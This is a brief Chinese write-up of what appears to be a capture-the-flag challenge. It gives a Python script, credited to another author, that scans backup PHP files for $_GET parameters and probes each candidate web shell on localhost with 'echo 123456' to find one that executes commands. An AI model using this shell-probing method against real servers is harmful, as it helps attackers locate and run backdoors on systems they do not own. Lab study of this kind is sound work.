下载备份文件,每个文件都有shell,但是好多都不能用,
所以需要py脚本筛选可用的shell,搬移一个大佬的wp
import re
import os
import requests
files = os.listdir('src/') #获取路径下的所有文件
reg = re.compile(r'(?<=_GET\[\').*(?=\'\])') #设置正则
for i in files: #从第一个文件开始
url = "http://127.0.0.1/src/" + i
f = open("src/"+i) #打开这个文件
data = f.read() #读取文件内容
f.close() #关闭文件
result = reg.findall(data) #从文件中找到GET请求
for j in result: #从第一个GET参数开始
payload = url + "?" + j + "=echo 123456" ##尝试请求次路径,并执行命令
print(payload)
html = requests.get(payload)##通过r=request.get(url)构造一个向服务器请求资源的url对象。
if "123456" in html.text:
print(payload)
exit(1)
考察的还是脚本编写。好好理解这个